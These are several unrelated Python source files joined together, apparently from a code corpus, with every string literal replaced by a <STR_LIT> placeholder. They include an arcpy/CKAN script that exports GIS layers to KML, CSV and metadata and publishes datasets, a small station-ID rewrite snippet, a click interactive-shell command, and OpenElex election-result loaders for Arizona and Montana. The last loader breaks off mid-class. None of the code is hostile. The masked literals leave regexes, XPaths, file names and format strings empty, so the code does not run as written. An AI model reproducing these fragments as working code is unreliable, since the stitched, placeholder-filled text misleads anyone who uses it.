    logger.debug('<STR_LIT>' + staging_feature_class + '<STR_LIT:">')
    arcpy.MakeFeatureLayer_management(staging_feature_class, name, '<STR_LIT>', '<STR_LIT>')
    # KML renders literal placeholder text, so scrub it from string fields first.
    replace_literal_nulls(name)
    logger.debug('<STR_LIT>' + destination + '<STR_LIT:">')
    arcpy.LayerToKML_conversion(name, destination, '<STR_LIT>', '<STR_LIT:false>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>')
    logger.debug('<STR_LIT>' + name)
    arcpy.Delete_management(name)
    publish_file(temp_working_folder, name + '<STR_LIT>', '<STR_LIT>')


def export_metadata():
    """Export, transform and publish the feature class metadata.

    When the configured XSLT exists, the raw export is transformed and
    re-imported onto the staging feature class; otherwise the raw export
    is published as-is.
    """
    folder = '<STR_LIT>'
    name = get_dataset_filename()
    temp_working_folder = os.path.join(temp_workspace, folder)
    create_folder(temp_working_folder, True)
    source = staging_feature_class
    raw_metadata_export = os.path.join(temp_working_folder, name + '<STR_LIT>')
    arcpy.env.workspace = temp_working_folder
    installDir = arcpy.GetInstallInfo('<STR_LIT>')['<STR_LIT>']
    translator = installDir + '<STR_LIT>'
    arcpy.ExportMetadata_conversion(source, translator, raw_metadata_export)
    destination = os.path.join(temp_working_folder, name + '<STR_LIT>')
    if os.path.exists(args.metadata_xslt):
        logger.info('<STR_LIT>' + args.metadata_xslt)
        arcpy.XSLTransform_conversion(raw_metadata_export, args.metadata_xslt, destination, '<STR_LIT>')
        logger.debug('<STR_LIT>' + destination)
        arcpy.MetadataImporter_conversion(destination, staging_feature_class)
    else:
        logger.warn('<STR_LIT>'.format(args.dataset_name))
        os.rename(raw_metadata_export, destination)
    publish_file(temp_working_folder, name + '<STR_LIT>', '<STR_LIT>')


def publish_metadata():
    """Publish the previously-exported metadata document."""
    folder = '<STR_LIT>'
    name = get_dataset_filename()
    temp_working_folder = os.path.join(temp_workspace, folder)
    publish_file(temp_working_folder, name + '<STR_LIT>', '<STR_LIT>')


def export_csv():
    """Export the staged feature class rows to CSV and publish it.

    Rows that cannot be serialized are counted and reported; if any row
    fails, the file is NOT published.
    """
    folder = '<STR_LIT>'
    name = get_dataset_filename()
    temp_working_folder = os.path.join(temp_workspace, folder)
    create_folder(temp_working_folder, True)
    source = staging_feature_class
    destination = os.path.join(temp_working_folder, name + '<STR_LIT>')
    logger.debug('<STR_LIT>' + source + '<STR_LIT>' + destination + '<STR_LIT:">')
    rows = arcpy.SearchCursor(source)
    fieldnames = [f.name for f in arcpy.ListFields(source)]
    # Geometry/OID-style columns are not meaningful in a CSV.
    if '<STR_LIT>' in fieldnames:
        fieldnames.remove('<STR_LIT>')
    if '<STR_LIT>' in fieldnames:
        fieldnames.remove('<STR_LIT>')
    error_report = '<STR_LIT>'
    error_count = 0
    csv_file = open(destination, '<STR_LIT:wb>')
    try:
        csv_writer = csv.writer(csv_file)
        csv_writer.writerow(fieldnames)
        for row in rows:
            values = [row.getValue(field) for field in fieldnames]
            try:
                csv_writer.writerow(values)
            except Exception:
                error_count += 1
                error_report = '<STR_LIT>'.format(error_report, values)
                if logger:
                    logger.debug('<STR_LIT>'.format(args.dataset_name, sys.exc_info()[1], sys.exc_info()[0], values))
    finally:
        # Close the output file even if an unexpected error interrupts the loop.
        csv_file.close()
    if error_count > 0:
        sys.exc_clear()
        logger.exception('<STR_LIT>'.format(args.dataset_name, error_report))
    else:
        publish_file(temp_working_folder, name + '<STR_LIT>', '<STR_LIT>')


def drop_exclude_fields():
    """Delete the configured excluded fields from the staging feature class."""
    exclude_fields = args.exclude_fields
    if exclude_fields is not None:
        logger.info('<STR_LIT>' + exclude_fields)
        # arcpy expects a semicolon-separated field list.
        exclude_fields = exclude_fields.replace('<STR_LIT:U+002C>', '<STR_LIT:;>')
        arcpy.DeleteField_management(staging_feature_class, exclude_fields)


def replace_literal_nulls(layer_name):
    """Replace placeholder text in string fields of *layer_name* with None."""
    logger.debug('<STR_LIT>')
    fields, row, rows = None, None, None
    try:
        fields = arcpy.ListFields(layer_name)
        rows = arcpy.UpdateCursor(layer_name)
        for row in rows:
            for field in fields:
                if field.type == '<STR_LIT>':
                    value = row.getValue(field.name)
                    if value is not None and value.find('<STR_LIT>') > -1:
                        logger.debug('<STR_LIT>'.format(field.name))
                        logger.debug('<STR_LIT>')
                        row.setValue(field.name, None)
                        logger.debug('<STR_LIT>'.format(value))
                        rows.updateRow(row)
        logger.debug('<STR_LIT>'.format(layer_name))
    finally:
        # Cursor objects hold schema locks; release them explicitly.
        if row:
            del row
        if rows:
            del rows


def get_remote_dataset(dataset_id):
    """Fetch the CKAN dataset entity, or None if it does not exist yet."""
    dataset_entity = None
    try:
        dataset_entity = ckan_client.package_entity_get(dataset_id)
        logger.info('<STR_LIT>' + dataset_id + '<STR_LIT>')
    except ckanclient.CkanApiNotFoundError:
        # Not-found is an expected outcome, not an error.
        logger.info('<STR_LIT>' + dataset_id + '<STR_LIT>')
    return dataset_entity


def create_dataset(dataset_id):
    """Build a new dataset entity locally and register it with CKAN."""
    dataset_entity = create_local_dataset(dataset_id)
    dataset_entity = update_dataset_resources(dataset_entity)
    if args.update_from_metadata is not None and '<STR_LIT>' in args.formats:
        dataset_entity = update_local_dataset_from_metadata(dataset_entity)
    if args.exe_result != '<STR_LIT>':
        create_remote_dataset(dataset_entity)
    else:
        logger.info('<STR_LIT>'.format(args.exe_result))


def create_local_dataset(dataset_id):
    """Construct a minimal CKAN dataset dictionary for *dataset_id*."""
    global args, ckan_client
    logger.info('<STR_LIT>' + dataset_id + '<STR_LIT>')
    dataset_entity = {}
    dataset_entity['<STR_LIT:name>'] = dataset_id
    dataset_entity['<STR_LIT>'] = args.ckan_license
    dataset_entity['<STR_LIT:title>'] = get_dataset_title()
    try:
        group_entity = ckan_client.group_entity_get(args.ckan_group_name)
        if group_entity is not None:
            logger.info('<STR_LIT>' + args.ckan_group_name)
            dataset_entity['<STR_LIT>'] = [group_entity['<STR_LIT:id>']]
    except ckanclient.CkanApiNotFoundError:
        # Missing group is non-fatal; publish the dataset without one.
        logger.warn('<STR_LIT>'.format(args.dataset_name, args.ckan_group_name))
        dataset_entity['<STR_LIT>'] = []
    return dataset_entity


def create_remote_dataset(dataset_entity):
    """Register *dataset_entity* as a new CKAN package."""
    global ckan_client
    ckan_client.package_register_post(dataset_entity)


def update_dataset(dataset_entity):
    """Refresh an existing CKAN dataset's resources, license and title."""
    dataset_entity = update_dataset_resources(dataset_entity)
    dataset_entity['<STR_LIT>'] = args.ckan_license
    dataset_entity['<STR_LIT:title>'] = get_dataset_title()
    if args.update_from_metadata is not None and '<STR_LIT>' in args.formats:
        dataset_entity = update_local_dataset_from_metadata(dataset_entity)
    update_remote_dataset(dataset_entity)


def update_dataset_resources(dataset_entity):
    """Create or refresh one CKAN resource entry per exported format.

    Existing resources (matched by format) are updated in place; missing
    ones are appended. Returns the modified entity.
    """
    global args, ckan_client
    resources = []
    if '<STR_LIT>' in dataset_entity:
        resources = dataset_entity['<STR_LIT>']
    dataset_file_name = get_dataset_filename()
    title = args.dataset_title

    if '<STR_LIT>' in args.formats:
        shp_resource = get_resource_by_format(resources, '<STR_LIT>')
        if shp_resource is None:
            logger.info('<STR_LIT>')
            shp_resource = {}
            resources.append(shp_resource)
        else:
            logger.info('<STR_LIT>')
        shp_resource['<STR_LIT:name>'] = title + '<STR_LIT>'
        shp_resource['<STR_LIT:description>'] = title + '<STR_LIT>'
        shp_resource['<STR_LIT:url>'] = args.download_url + dataset_file_name + '<STR_LIT>' + dataset_file_name + '<STR_LIT>'
        shp_resource['<STR_LIT>'] = '<STR_LIT>'
        shp_resource['<STR_LIT>'] = '<STR_LIT>'
        shp_resource['<STR_LIT>'] = '<STR_LIT:file>'
        file_size = get_file_size(output_folder + '<STR_LIT>' + dataset_file_name + '<STR_LIT>')
        if file_size:
            shp_resource['<STR_LIT:size>'] = file_size

    if '<STR_LIT>' in args.formats:
        dwg_resource = get_resource_by_format(resources, '<STR_LIT>')
        if dwg_resource is None:
            logger.info('<STR_LIT>')
            dwg_resource = {}
            resources.append(dwg_resource)
        else:
            logger.info('<STR_LIT>')
        dwg_resource['<STR_LIT:name>'] = title + '<STR_LIT>'
        dwg_resource['<STR_LIT:description>'] = title + '<STR_LIT>'
        dwg_resource['<STR_LIT:url>'] = args.download_url + dataset_file_name + '<STR_LIT>' + dataset_file_name + '<STR_LIT>'
        dwg_resource['<STR_LIT>'] = '<STR_LIT>'
        dwg_resource['<STR_LIT>'] = '<STR_LIT>'
        dwg_resource['<STR_LIT>'] = '<STR_LIT:file>'
        file_size = get_file_size(output_folder + '<STR_LIT>' + dataset_file_name + '<STR_LIT>')
        if file_size:
            dwg_resource['<STR_LIT:size>'] = file_size

    if '<STR_LIT>' in args.formats:
        kml_resource = get_resource_by_format(resources, '<STR_LIT>')
        if kml_resource is None:
            logger.info('<STR_LIT>')
            kml_resource = {}
            resources.append(kml_resource)
        else:
            logger.info('<STR_LIT>')
        kml_resource['<STR_LIT:name>'] = title + '<STR_LIT>'
        kml_resource['<STR_LIT:description>'] = title + '<STR_LIT>'
        kml_resource['<STR_LIT:url>'] = args.download_url + dataset_file_name + '<STR_LIT>' + dataset_file_name + '<STR_LIT>'
        kml_resource['<STR_LIT>'] = '<STR_LIT>'
        kml_resource['<STR_LIT>'] = '<STR_LIT>'
        kml_resource['<STR_LIT>'] = '<STR_LIT:file>'
        file_size = get_file_size(output_folder + '<STR_LIT>' + dataset_file_name + '<STR_LIT>')
        if file_size:
            kml_resource['<STR_LIT:size>'] = file_size

    if '<STR_LIT>' in args.formats:
        csv_resource = get_resource_by_format(resources, '<STR_LIT>')
        if csv_resource is None:
            logger.info('<STR_LIT>')
            csv_resource = {}
            resources.append(csv_resource)
        else:
            logger.info('<STR_LIT>')
        csv_resource['<STR_LIT:name>'] = title + '<STR_LIT>'
        csv_resource['<STR_LIT:description>'] = title + '<STR_LIT>'
        csv_resource['<STR_LIT:url>'] = args.download_url + dataset_file_name + '<STR_LIT>' + dataset_file_name + '<STR_LIT>'
        csv_resource['<STR_LIT>'] = '<STR_LIT>'
        csv_resource['<STR_LIT>'] = '<STR_LIT>'
        csv_resource['<STR_LIT>'] = '<STR_LIT:file>'
        file_size = get_file_size(output_folder + '<STR_LIT>' + dataset_file_name + '<STR_LIT>')
        if file_size:
            csv_resource['<STR_LIT:size>'] = file_size

    if '<STR_LIT>' in args.formats:
        metadata_resource = get_resource_by_format(resources, '<STR_LIT>')
        if metadata_resource is None:
            logger.info('<STR_LIT>')
            metadata_resource = {}
            resources.append(metadata_resource)
        else:
            logger.info('<STR_LIT>')
        metadata_resource['<STR_LIT:name>'] = title + '<STR_LIT>'
        metadata_resource['<STR_LIT:description>'] = title + '<STR_LIT>'
        metadata_resource['<STR_LIT:url>'] = args.download_url + dataset_file_name + '<STR_LIT>' + dataset_file_name + '<STR_LIT>'
        metadata_resource['<STR_LIT>'] = '<STR_LIT>'
        metadata_resource['<STR_LIT>'] = '<STR_LIT>'
        metadata_resource['<STR_LIT>'] = '<STR_LIT>'
        file_size = get_file_size(output_folder + '<STR_LIT>' + dataset_file_name + '<STR_LIT>')
        if file_size:
            metadata_resource['<STR_LIT:size>'] = file_size

    if '<STR_LIT>' in args.formats:
        gdb_resource = get_resource_by_format(resources, '<STR_LIT>')
        if gdb_resource is None:
            logger.info('<STR_LIT>')
            gdb_resource = {}
            resources.append(gdb_resource)
        else:
            logger.info('<STR_LIT>')
        gdb_resource['<STR_LIT:name>'] = title + '<STR_LIT>'
        gdb_resource['<STR_LIT:description>'] = title + '<STR_LIT>'
        gdb_resource['<STR_LIT:url>'] = args.download_url + dataset_file_name + '<STR_LIT>' + dataset_file_name + '<STR_LIT>'
        gdb_resource['<STR_LIT>'] = '<STR_LIT>'
        gdb_resource['<STR_LIT>'] = '<STR_LIT>'
        gdb_resource['<STR_LIT>'] = '<STR_LIT:file>'
        file_size = get_file_size(output_folder + '<STR_LIT>' + dataset_file_name + '<STR_LIT>')
        if file_size:
            gdb_resource['<STR_LIT:size>'] = file_size

    dataset_entity['<STR_LIT>'] = resources
    return dataset_entity


def get_resource_by_format(resources, format_type):
    """Return the first resource whose format matches (case-insensitively)."""
    for resource in resources:
        current_format = resource['<STR_LIT>']
        if str(current_format).strip().upper() == format_type.strip().upper():
            return resource
    return None


def get_file_size(file_path):
    """Return the size of *file_path* in bytes, or None if it is unreadable."""
    file_size = None
    try:
        file_size = os.path.getsize(file_path)
    except Exception:
        # Missing export files are expected in some runs; warn and carry on.
        logger.warn('<STR_LIT>'.format(args.dataset_name, file_path))
    return file_size


def slugify_string(in_str):
    """Normalize *in_str* into a lowercase hyphenated slug for CKAN tags."""
    slug = re.sub('<STR_LIT>', '<STR_LIT:->', in_str)
    slug = re.sub('<STR_LIT>', '<STR_LIT>', slug).lower().strip('<STR_LIT:->')
    slug = re.sub('<STR_LIT>', '<STR_LIT:->', slug)
    return slug


def update_local_dataset_from_metadata(dataset_entity):
    """Populate the dataset entity from the exported metadata document.

    Reads abstract, maintainer, maintainer email, author and theme/place
    keywords out of the published metadata XML. Returns the modified entity.
    """
    folder = '<STR_LIT>'
    name = get_dataset_filename()
    working_folder = os.path.join(output_folder, folder)
    file_path = os.path.join(working_folder, name + '<STR_LIT>')
    # 'with' closes the metadata file even if parsing raises.
    with open(file_path, '<STR_LIT:r>') as metadata_file:
        metadata_xml = et.parse(metadata_file)

    title = get_dataset_title()
    dataset_entity['<STR_LIT:title>'] = title

    xpath_abstract = '<STR_LIT>'
    abstract_element = metadata_xml.find(xpath_abstract)
    if abstract_element is not None:
        dataset_entity['<STR_LIT>'] = abstract_element.text
    else:
        logger.warn('<STR_LIT>'.format(args.dataset_name))

    xpath_maintainer = '<STR_LIT>'
    maintainer_element = metadata_xml.find(xpath_maintainer)
    if maintainer_element is not None:
        dataset_entity['<STR_LIT>'] = maintainer_element.text
    else:
        logger.warn('<STR_LIT>'.format(args.dataset_name))

    xpath_maintainer_email = '<STR_LIT>'
    maintainer_email_element = metadata_xml.find(xpath_maintainer_email)
    if maintainer_email_element is not None:
        dataset_entity['<STR_LIT>'] = maintainer_email_element.text
    else:
        logger.warn('<STR_LIT>'.format(args.dataset_name))

    xpath_author = '<STR_LIT>'
    author_element = metadata_xml.find(xpath_author)
    if author_element is not None:
        dataset_entity['<STR_LIT>'] = author_element.text
    else:
        logger.warn('<STR_LIT>'.format(args.dataset_name))

    dataset_entity['<STR_LIT>'] = '<STR_LIT>'

    keywords = []
    if '<STR_LIT>' in dataset_entity and '<STR_LIT>' in dataset_entity['<STR_LIT>']:
        keywords.append('<STR_LIT>')
        logger.info('<STR_LIT>')

    xpath_theme_keys = '<STR_LIT>'
    theme_keyword_elements = metadata_xml.findall(xpath_theme_keys)
    xpath_place_keys = '<STR_LIT>'
    place_keyword_elements = metadata_xml.findall(xpath_place_keys)
    for keyword_element in theme_keyword_elements + place_keyword_elements:
        keyword = slugify_string(keyword_element.text)
        keywords.append(keyword)
        logger.debug('<STR_LIT>' + keyword)
    keywords.append('<STR_LIT>')
    dataset_entity['<STR_LIT>'] = keywords
    return dataset_entity


def update_remote_dataset(dataset_entity):
    """Push the updated dataset entity back to CKAN."""
    global ckan_client
    logger.info('<STR_LIT>')
    ckan_client.package_entity_put(dataset_entity)


def update_dataset_version():
    """Increment the dataset's version field on CKAN per args.increment."""
    global args
    logger.info('<STR_LIT>')
    ckan = ckanclient.CkanClient(base_location=args.ckan_api, api_key=args.ckan_api_key)
    dataset_id = args.ckan_dataset_name_prefix + args.dataset_name
    try:
        dataset_entity = ckan.package_entity_get(dataset_id)
        version = dataset_entity['<STR_LIT:version>']
        version = increment_version(version, args.increment)
        dataset_entity['<STR_LIT:version>'] = version
        ckan.package_entity_put(dataset_entity)
    except ckanclient.CkanApiNotFoundError:
        logger.info('<STR_LIT>' + dataset_id + '<STR_LIT>')


def increment_version(version, increment_type):
    """Return *version* bumped at major/minor/revision per *increment_type*.

    A None version gets the initial default; a version that is not a
    three-part dotted string is returned unchanged.
    """
    incremented_version = version
    if version is None:
        incremented_version = '<STR_LIT>'
        logger.info('<STR_LIT>' + incremented_version)
    else:
        version_parts = version.split('<STR_LIT:.>')
        if len(version_parts) == 3:
            major = int(version_parts[0])
            minor = int(version_parts[1])
            revision = int(version_parts[2])
            if increment_type == '<STR_LIT>':
                major = major + 1
            elif increment_type == '<STR_LIT>':
                minor = minor + 1
            elif increment_type == '<STR_LIT>':
                revision = revision + 1
            incremented_version = str(major) + '<STR_LIT:.>' + str(minor) + '<STR_LIT:.>' + str(revision)
            logger.info('<STR_LIT>' + version + '<STR_LIT>' + incremented_version)
    return incremented_version


def init_logger():
    """Configure the module logger from file config plus a per-dataset file.

    Raises ValueError when args.log_level is not a recognized level name.
    """
    global logger
    logging.config.fileConfig('<STR_LIT>')
    if args.build_target == '<STR_LIT>':
        logger = logging.getLogger('<STR_LIT>')
    else:
        logger = logging.getLogger('<STR_LIT>')
    numeric_level = getattr(logging, args.log_level.upper(), None)
    if not isinstance(numeric_level, int):
        raise ValueError('<STR_LIT>' % args.log_level)
    logger.setLevel(numeric_level)
    logger.name = '<STR_LIT>'
    # Mirror the console handler's level/format into a per-dataset log file.
    consoleHandler = logger.handlers[0]
    logFileName = '<STR_LIT>' + args.dataset_name + '<STR_LIT>'
    fileHandler = logging.FileHandler(logFileName)
    fileHandler.setLevel(consoleHandler.level)
    fileHandler.setFormatter(consoleHandler.formatter)
    logger.addHandler(fileHandler)


if __name__ == '<STR_LIT:__main__>':
    main()
<s> f = open ( "<STR_LIT>" , "<STR_LIT:r>" ) <EOL> r = open ( "<STR_LIT>" , "<STR_LIT:w>" ) <EOL> r . write ( f . readline ( ) ) <EOL> lines = f . readlines ( ) <EOL> for line in lines : <EOL> stationID = line . split ( "<STR_LIT:U+002C>" ) [ <NUM_LIT:0> ] <EOL> newStationID = int ( stationID ) + <NUM_LIT> <EOL> outLine = str ( newStationID ) + line [ len ( stationID ) : ] <EOL> r . write ( outLine ) <EOL> r . close ( ) <EOL> f . close ( ) </s>
<s> import os <EOL> from os . path import dirname , join <EOL> PROJECT_ROOT = dirname ( __file__ ) <EOL> COUNTRY_DIR = join ( PROJECT_ROOT , '<STR_LIT>' ) </s>
<s> import code <EOL> import os <EOL> import click <EOL> @ click . command ( help = "<STR_LIT>" ) <EOL> @ click . option ( '<STR_LIT>' , is_flag = True ) <EOL> def shell ( no_startup = False ) : <EOL> """<STR_LIT>""" <EOL> imported_objects = { } <EOL> try : <EOL> import readline <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> import rlcompleter <EOL> readline . set_completer ( rlcompleter . Completer ( imported_objects ) . complete ) <EOL> readline . parse_and_bind ( "<STR_LIT>" ) <EOL> if not no_startup : <EOL> for pythonrc in ( os . environ . get ( "<STR_LIT>" ) , '<STR_LIT>' ) : <EOL> if not pythonrc : <EOL> continue <EOL> pythonrc = os . path . expanduser ( pythonrc ) <EOL> if not os . path . isfile ( pythonrc ) : <EOL> continue <EOL> try : <EOL> with open ( pythonrc ) as handle : <EOL> exec ( compile ( handle . read ( ) , pythonrc , '<STR_LIT>' ) , imported_objects ) <EOL> except NameError : <EOL> pass <EOL> code . interact ( local = imported_objects ) </s>
<s> import re <EOL> import csv <EOL> import unicodecsv <EOL> from openelex . base . load import BaseLoader <EOL> from openelex . models import RawResult <EOL> from openelex . lib . text import ocd_type_id , slugify <EOL> from . datasource import Datasource <EOL> """<STR_LIT>""" <EOL> class LoadResults ( object ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , mapping ) : <EOL> election_id = mapping [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in election_id : <EOL> loader = AZPrecinctLoader ( ) <EOL> elif '<STR_LIT>' in election_id : <EOL> loader = AZSpecialLoader ( ) <EOL> else : <EOL> loader = AZCountyLoader ( ) <EOL> loader . run ( mapping ) <EOL> class AZBaseLoader ( BaseLoader ) : <EOL> datasource = Datasource ( ) <EOL> target_offices = set ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> district_offices = set ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> def _skip_row ( self , row ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> class AZPrecinctLoader ( AZBaseLoader ) : <EOL> """<STR_LIT>""" <EOL> def load ( self ) : <EOL> headers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> self . _common_kwargs = self . _build_common_election_kwargs ( ) <EOL> self . _common_kwargs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> results = [ ] <EOL> with self . _file_handle as csvfile : <EOL> reader = unicodecsv . DictReader ( csvfile , fieldnames = headers , encoding = '<STR_LIT>' ) <EOL> for row in reader : <EOL> if self . _skip_row ( row ) : <EOL> continue <EOL> if row [ '<STR_LIT>' ] . strip ( ) == '<STR_LIT>' : <EOL> total_votes = int ( row [ '<STR_LIT>' ] . strip ( ) ) <EOL> contest_winner = row [ '<STR_LIT>' ] . 
strip ( ) <EOL> else : <EOL> rr_kwargs = self . _common_kwargs . copy ( ) <EOL> rr_kwargs [ '<STR_LIT>' ] = row [ '<STR_LIT>' ] . strip ( ) <EOL> rr_kwargs . update ( self . _build_contest_kwargs ( row ) ) <EOL> rr_kwargs . update ( self . _build_candidate_kwargs ( row ) ) <EOL> jurisdiction = row [ '<STR_LIT>' ] . strip ( ) <EOL> county_ocd_id = [ c for c in self . datasource . _jurisdictions ( ) if c [ '<STR_LIT>' ] . upper ( ) == row [ '<STR_LIT>' ] . upper ( ) ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> rr_kwargs . update ( { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : jurisdiction , <EOL> '<STR_LIT>' : "<STR_LIT>" . format ( county_ocd_id , ocd_type_id ( jurisdiction ) ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : int ( row [ '<STR_LIT>' ] . strip ( ) ) <EOL> } ) <EOL> results . append ( RawResult ( ** rr_kwargs ) ) <EOL> RawResult . objects . insert ( results ) <EOL> def _skip_row ( self , row ) : <EOL> return row [ '<STR_LIT>' ] . strip ( ) not in self . target_offices <EOL> def _build_contest_kwargs ( self , row ) : <EOL> return { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> } <EOL> def _build_candidate_kwargs ( self , row ) : <EOL> return { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) <EOL> } <EOL> class AZCountyLoader ( AZBaseLoader ) : <EOL> """<STR_LIT>""" <EOL> def load ( self ) : <EOL> headers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> self . _common_kwargs = self . _build_common_election_kwargs ( ) <EOL> self . _common_kwargs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> results = [ ] <EOL> with self . _file_handle as csvfile : <EOL> reader = unicodecsv . 
DictReader ( csvfile , fieldnames = headers , encoding = '<STR_LIT>' ) <EOL> for row in reader : <EOL> if self . _skip_row ( row ) : <EOL> continue <EOL> rr_kwargs = self . _common_kwargs . copy ( ) <EOL> rr_kwargs . update ( self . _build_contest_kwargs ( row ) ) <EOL> rr_kwargs . update ( self . _build_candidate_kwargs ( row ) ) <EOL> if row [ '<STR_LIT>' ] . strip ( ) == '<STR_LIT>' : <EOL> rr_kwargs . update ( { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] <EOL> } ) <EOL> results . append ( RawResult ( ** rr_kwargs ) ) <EOL> RawResult . objects . insert ( results ) <EOL> def _skip_row ( self , row ) : <EOL> return row [ '<STR_LIT>' ] . strip ( ) not in self . target_offices <EOL> def _build_contest_kwargs ( self , row ) : <EOL> return { <EOL> '<STR_LIT>' : "<STR_LIT>" . format ( self . mapping [ '<STR_LIT>' ] , <EOL> ocd_type_id ( row [ '<STR_LIT>' ] . strip ( ) ) ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> } <EOL> def _build_candidate_kwargs ( self , row ) : <EOL> return { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : int ( row [ '<STR_LIT>' ] . strip ( ) ) <EOL> } <EOL> class AZSpecialLoader ( AZBaseLoader ) : <EOL> """<STR_LIT>""" <EOL> def load ( self ) : <EOL> headers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> self . _common_kwargs = self . _build_common_election_kwargs ( ) <EOL> self . _common_kwargs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> results = [ ] <EOL> with self . _file_handle as csvfile : <EOL> reader = unicodecsv . DictReader ( csvfile , fieldnames = headers , encoding = '<STR_LIT>' ) <EOL> for row in reader : <EOL> if self . 
_skip_row ( row ) : <EOL> continue <EOL> if row [ '<STR_LIT>' ] . strip ( ) == '<STR_LIT>' : <EOL> total_votes = int ( row [ '<STR_LIT>' ] . strip ( ) ) <EOL> else : <EOL> rr_kwargs = self . _common_kwargs . copy ( ) <EOL> rr_kwargs . update ( self . _build_contest_kwargs ( row ) ) <EOL> rr_kwargs . update ( self . _build_candidate_kwargs ( row ) ) <EOL> jurisdiction = row [ '<STR_LIT>' ] . strip ( ) <EOL> rr_kwargs . update ( { <EOL> '<STR_LIT>' : jurisdiction , <EOL> '<STR_LIT>' : "<STR_LIT>" . format ( self . mapping [ '<STR_LIT>' ] , <EOL> ocd_type_id ( jurisdiction ) ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : int ( row [ '<STR_LIT>' ] . strip ( ) ) <EOL> } ) <EOL> results . append ( RawResult ( ** rr_kwargs ) ) <EOL> RawResult . objects . insert ( results ) <EOL> def _skip_row ( self , row ) : <EOL> return row [ '<STR_LIT>' ] . strip ( ) not in self . target_offices <EOL> def _build_contest_kwargs ( self , row ) : <EOL> return { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> } <EOL> def _build_candidate_kwargs ( self , row ) : <EOL> return { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) <EOL> } </s>
<s> import re <EOL> import csv <EOL> import unicodecsv <EOL> from openelex . base . load import BaseLoader <EOL> from openelex . models import RawResult <EOL> from openelex . lib . text import ocd_type_id , slugify <EOL> from . datasource import Datasource <EOL> """<STR_LIT>""" <EOL> class LoadResults ( object ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , mapping ) : <EOL> election_id = mapping [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in election_id : <EOL> loader = MTPrecinctLoader ( ) <EOL> else : <EOL> loader = MTCountyLoader ( ) <EOL> loader . run ( mapping ) <EOL> class MTBaseLoader ( BaseLoader ) : <EOL> datasource = Datasource ( ) <EOL> target_offices = set ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> district_offices = set ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> def _skip_row ( self , row ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> class MTPrecinctLoader ( MTBaseLoader ) : <EOL> """<STR_LIT>""" <EOL> def load ( self ) : <EOL> headers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> self . _common_kwargs = self . _build_common_election_kwargs ( ) <EOL> self . _common_kwargs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> results = [ ] 